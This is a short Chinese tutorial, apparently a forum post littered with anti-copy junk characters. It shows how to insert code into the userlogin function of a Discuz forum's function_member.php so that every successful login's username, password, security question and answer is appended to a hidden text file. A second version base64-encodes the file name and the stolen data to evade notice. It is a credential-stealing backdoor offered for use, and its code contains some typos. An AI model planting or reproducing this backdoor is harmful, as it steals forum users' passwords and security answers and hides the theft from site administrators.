
//打开source/function/function_member.php
' m. A @# F* m3 V' g
5 k) u' {) E9 G4 D2 [ I+ c //找到function userlogin' R/ I! ?1 l3 H( z6 t! ]& h) y8 M
- c9 R3 d4 d. n* d( L1 a3 J& \ //在return $return;前面加上
; ~% K% h" q! F1 a7 b5 o, i8 R 7 k- }7 a4 G+ w" B- |! a8 R5 y8 l
$a=file_get_contents(dirname(__FILE__).’/1.txt’);
; u: U0 K: n% k' H ; _/ j# \- G: N" N; C3 n
file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”rn”);
O! f! J/ r5 y2 C9 K+ m - C8 u5 W. y) C9 q* s8 n
//记录登陆成功的账号密码以及问题答案!保存在source/function/目录下的1.txt
1 J$ K1 z5 f' Q* X
4 A9 e( x- \4 A C* Q8 y$ F ?>* |; N4 F/ S3 H$ g( p3 {. p
一般上面的这样容易发现,我会把1.txt改名,并且base64_encode之后再保存。# G, F7 W& Y+ Z; I1 @! }5 O
3 J! h& O, \: k) h" X: E
0 T `* Q6 C. V% d
//base64_encode之后再保存。' V8 h0 K# D; C4 Q2 L, ~
2 C$ E1 ~! G _& g $a = file_get_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’));8 X% Q! K# G" b- {
3 B% E! h$ C8 s( c# f file_put_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’),$a.base64_encode(“Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer).”rn”);
8 `" z; m9 U5 S Z( S( G5 f A 4 v& M- e' Q6 I# }4 Q* G+ k
?> |
|